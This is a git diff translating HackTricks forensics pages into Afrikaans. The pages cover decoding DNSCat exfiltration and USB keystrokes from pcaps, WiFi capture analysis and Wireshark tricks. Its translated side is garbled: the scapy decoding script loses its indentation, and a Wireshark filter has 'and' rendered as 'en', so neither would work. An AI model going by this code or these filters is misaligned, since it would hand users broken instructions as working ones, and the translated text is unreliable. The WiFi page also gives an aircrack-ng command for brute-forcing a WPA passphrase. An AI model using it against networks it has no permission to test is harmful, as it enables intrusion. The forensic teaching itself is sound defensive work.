eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-If you have pcap with data being **exfiltrated by DNSCat** (without using encryption), you can find the exfiltrated content. - -You only need to know that the **first 9 bytes** are not real data but are related to the **C\&C communication**: +As jy 'n pcap het met data wat **deur DNSCat uitgelekte word** (sonder om versleuteling te gebruik), kan jy die uitgelekte inhoud vind. +Jy hoef net te weet dat die **eerste 9 byte** nie werklike data is nie, maar verband hou met die **C\&C-kommunikasie**: ```python from scapy.all import rdpcap, DNSQR, DNSRR -import struct +import struct f = "" last = "" for p in rdpcap('ch21.pcap'): - if p.haslayer(DNSQR) and not p.haslayer(DNSRR): +if p.haslayer(DNSQR) and not p.haslayer(DNSRR): - qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".") - qry = ''.join(_.decode('hex') for _ in qry)[9:] - if last != qry: - print(qry) - f += qry - last = qry +qry = p[DNSQR].qname.replace(".jz-n-bs.local.","").strip().split(".") +qry = ''.join(_.decode('hex') for _ in qry)[9:] +if last != qry: +print(qry) +f += qry +last = qry #print(f) ``` - -For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\ +Vir meer inligting: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\ [https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md) -There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder) - +Daar is 'n skripsie wat met Python3 werk: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder) ``` python3 dnscat_decoder.py sample.pcap bad_domain ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md index ec70883d9..b0e789844 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md @@ -1,27 +1,25 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-If you have a pcap of a USB connection with a lot of Interruptions probably it is a USB Keyboard connection. +As jy 'n pcap het van 'n USB-verbinding met baie onderbrekings, is dit waarskynlik 'n USB-toetsbordverbinding. -A wireshark filter like this could be useful: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)` +'n Wireshark-filter soos hierdie kan nuttig wees: `usb.transfer_type == 0x01 en frame.len == 35 en !(usb.capdata == 00:00:00:00:00:00:00:00)` -It could be important to know that the data that starts with "02" is pressed using shift. +Dit kan belangrik wees om te weet dat die data wat met "02" begin, gedruk word deur die Shift-knoppie. -You can read more information and find some scripts about how to analyse this in: +Jy kan meer inligting lees en sommige skripte vind oor hoe om dit te analiseer in: * [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) * [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) @@ -30,16 +28,14 @@ You can read more information and find some scripts about how to analyse this in
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md index 8168fa14d..67e8876cd 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md @@ -1,34 +1,28 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-If you have a pcap containing the communication via USB of a keyboard like the following one: +As jy 'n pcap het wat die kommunikasie via USB van 'n sleutelbord bevat, soos die volgende een: ![](<../../../.gitbook/assets/image (613).png>) -You can use the tool [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) to get what was written in the communication: - +Jy kan die instrument [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) gebruik om te sien wat in die kommunikasie geskryf is: ```bash tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt python3 usbkeyboard.py ./keystrokes.txt ``` - - - -You can read more information and find some scripts about how to analyse this in: +Jy kan meer inligting lees en sommige skripte vind oor hoe om dit te analiseer in: * [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) * [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) @@ -36,16 +30,14 @@ You can read more information and find some scripts about how to analyse this in
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md index 51a053801..f6dd9e3fe 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md @@ -1,23 +1,21 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Check BSSIDs +# Kontroleer BSSIDs -When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_: +Wanneer jy 'n vangste ontvang waarvan die hoofverkeer Wifi is en jy gebruik WireShark, kan jy begin ondersoek instel na al die SSIDs van die vangste met _Wireless --> WLAN Traffic_: ![](<../../../.gitbook/assets/image (424).png>) @@ -25,31 +23,29 @@ When you receive a capture whose principal traffic is Wifi using WireShark you c ## Brute Force -One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`: - +Een van die kolomme van daardie skerm dui aan of **enige outentifikasie binne die pcap gevind is**. As dit die geval is, kan jy probeer om dit te Brute force deur `aircrack-ng` te gebruik: ```bash aircrack-ng -w pwds-file.txt -b file.pcap ``` +Byvoorbeeld, dit sal die WPA-wagwoord herwin wat 'n PSK (vooraf gedeelde sleutel) beskerm, wat later nodig sal wees om die verkeer te ontsleutel. -For example it will retrieve the WPA passphrase protecting a PSK (pre shared-key), that will be required to decrypt the trafic later. +# Data in Beacons / Sykanaal -# Data in Beacons / Side Channel +As jy vermoed dat **data binne beacons van 'n WiFi-netwerk uitgelek word**, kan jy die beacons van die netwerk ondersoek deur 'n filter soos die volgende te gebruik: `wlan bevat `, of `wlan.ssid == "NAAMvanNETWERK"` soek binne die gefiltreerde pakkies vir verdagte strings. -If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains `, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings. +# Vind Onbekende MAC-adresse in 'n WiFi-netwerk -# Find Unknown MAC Addresses in A Wifi Network - -The following link will be useful to find the **machines sending data inside a Wifi Network**: +Die volgende skakel sal nuttig wees om die **toestelle wat data binne 'n WiFi-netwerk stuur** te vind: * `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2` -If you already know **MAC addresses you can remove them from the output** adding checks like this one: `&& !(wlan.addr==5c:51:88:31:a0:3b)` +As jy reeds **MAC-adresse ken, kan jy dit uit die uitset verwyder** deur kontroles soos hierdie een by te voeg: `&& !(wlan.addr==5c:51:88:31:a0:3b)` -Once you have detected **unknown MAC** addresses communicating inside the network you can use **filters** like the following one: `wlan.addr== && (ftp || http || ssh || telnet)` to filter its traffic. Note that ftp/http/ssh/telnet filters are useful if you have decrypted the traffic. +Nadat jy **onbekende MAC-adresse wat binne die netwerk kommunikeer, opgespoor het**, kan jy **filters** soos die volgende een gebruik: `wlan.addr== && (ftp || http || ssh || telnet)` om die verkeer te filtreer. Let daarop dat ftp/http/ssh/telnet-filters nuttig is as jy die verkeer ontsluit het. -# Decrypt Traffic +# Ontsleutel Verkeer -Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit +Wysig --> Voorkeure --> Protokolle --> IEEE 802.11 --> Wysig ![](<../../../.gitbook/assets/image (426).png>) @@ -59,16 +55,14 @@ Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index 1b34fb3ca..c9acaa3af 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md @@ -1,183 +1,181 @@ -# Wireshark tricks +# Wireshark-truuks -## Wireshark tricks +## Wireshark-truuks
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Improve your Wireshark skills +## Verbeter jou Wireshark-vaardighede -### Tutorials +### Tutoriale -The following tutorials are amazing to learn some cool basic tricks: +Die volgende tutoriale is fantasties om 'n paar koel basiese truuks te leer: * [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/) * [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/) * [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/) * [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/) -### Analysed Information +### Geanaliseerde inligting -**Expert Information** +**Ekspertinligting** -Clicking on _**Analyze** --> **Expert Information**_ you will have an **overview** of what is happening in the packets **analyzed**: +Deur te klik op _**Analyze** --> **Expert Information**_ sal jy 'n **oorsig** kry van wat in die geanaliseerde pakkies gebeur: ![](<../../../.gitbook/assets/image (570).png>) -**Resolved Addresses** +**Opgeloste adresse** -Under _**Statistics --> Resolved Addresses**_ you can find several **information** that was "**resolved**" by wireshark like port/transport to protocol, MAC to the manufacturer, etc. It is interesting to know what is implicated in the communication. +Onder _**Statistics --> Resolved Addresses**_ kan jy verskeie **inligting** vind wat deur Wireshark "**opgelos**" is, soos poort/vervoer na protokol, MAC na die vervaardiger, ens. Dit is interessant om te weet wat betrokke is in die kommunikasie. ![](<../../../.gitbook/assets/image (571).png>) -**Protocol Hierarchy** +**Protokolhiërargie** -Under _**Statistics --> Protocol Hierarchy**_ you can find the **protocols** **involved** in the communication and data about them. +Onder _**Statistics --> Protocol Hierarchy**_ kan jy die **protokolle** vind wat betrokke is by die kommunikasie en inligting daaroor. ![](<../../../.gitbook/assets/image (572).png>) -**Conversations** +**Gesprekke** -Under _**Statistics --> Conversations**_ you can find a **summary of the conversations** in the communication and data about them. +Onder _**Statistics --> Conversations**_ kan jy 'n **opsomming van die gesprekke** in die kommunikasie vind en inligting daaroor. ![](<../../../.gitbook/assets/image (573).png>) -**Endpoints** +**Eindpunte** -Under _**Statistics --> Endpoints**_ you can find a **summary of the endpoints** in the communication and data about each of them. +Onder _**Statistics --> Endpoints**_ kan jy 'n **opsomming van die eindpunte** in die kommunikasie vind en inligting daaroor. ![](<../../../.gitbook/assets/image (575).png>) -**DNS info** +**DNS-inligting** -Under _**Statistics --> DNS**_ you can find statistics about the DNS request captured. +Onder _**Statistics --> DNS**_ kan jy statistieke oor die vasgevangste DNS-versoek vind. ![](<../../../.gitbook/assets/image (577).png>) -**I/O Graph** +**I/O-grafiek** -Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication.** +Onder _**Statistics --> I/O Graph**_ kan jy 'n **grafiek van die kommunikasie** vind. ![](<../../../.gitbook/assets/image (574).png>) -### Filters +### Filtreerders -Here you can find wireshark filter depending on the protocol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\ -Other interesting filters: +Hier kan jy Wireshark-filtreerders vind, afhangende van die protokol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\ +Ander interessante filtreerders: * `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)` - * HTTP and initial HTTPS traffic +* HTTP- en aanvanklike HTTPS-verkeer * `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)` - * HTTP and initial HTTPS traffic + TCP SYN +* HTTP- en aanvanklike HTTPS-verkeer + TCP SYN * `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)` - * HTTP and initial HTTPS traffic + TCP SYN + DNS requests +* HTTP- en aanvanklike HTTPS-verkeer + TCP SYN + DNS-versoeke -### Search +### Soek -If you want to **search** for **content** inside the **packets** of the sessions press _CTRL+f_. You can add new layers to the main information bar (No., Time, Source, etc.) by pressing the right button and then the edit column. +As jy wil **soek** na **inhoud** binne die **pakkies** van die sessies, druk _CTRL+f_. Jy kan nuwe lae byvoeg tot die hoofinligtingstabel (No., Tyd, Bron, ens.) deur die regterknoppie te druk en dan die kolom te wysig. -### Free pcap labs +### Gratis pcap-laboratoriums -**Practice with the free challenges of: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)** +**Oefen met die gratis uitdagings van: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)** -## Identifying Domains +## Identifiseer domeine -You can add a column that shows the Host HTTP header: +Jy kan 'n kolom byvoeg wat die Host HTTP-kop wys: ![](<../../../.gitbook/assets/image (403).png>) -And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**): +En 'n kolom wat die Bedienernaam byvoeg van 'n inisieerende HTTPS-verbinding (**ssl.handshake.type == 1**): ![](<../../../.gitbook/assets/image (408) (1).png>) -## Identifying local hostnames +## Identifiseer plaaslike hostnames -### From DHCP +### Vanaf DHCP -In current Wireshark instead of `bootp` you need to search for `DHCP` +In die huidige Wireshark moet jy in plaas van `bootp` soek vir `DHCP` ![](<../../../.gitbook/assets/image (404).png>) -### From NBNS +### Vanaf NBNS ![](<../../../.gitbook/assets/image (405).png>) -## Decrypting TLS +## Ontsleutel TLS -### Decrypting https traffic with server private key +### Ontsleutel https-verkeer met bedienerprivaatsleutel _edit>preference>protocol>ssl>_ ![](<../../../.gitbook/assets/image (98).png>) -Press _Edit_ and add all the data of the server and the private key (_IP, Port, Protocol, Key file and password_) +Druk _Edit_ en voeg al die data van die bediener en die privaatsleutel by (_IP, Poort, Protokol, Sleutel-lêer en wagwoord_) -### Decrypting https traffic with symmetric session keys +### Ontsleutel https-verkeer met simmetriese sessiesleutels -Both Firefox and Chrome have the capability to log TLS session keys, which can be used with 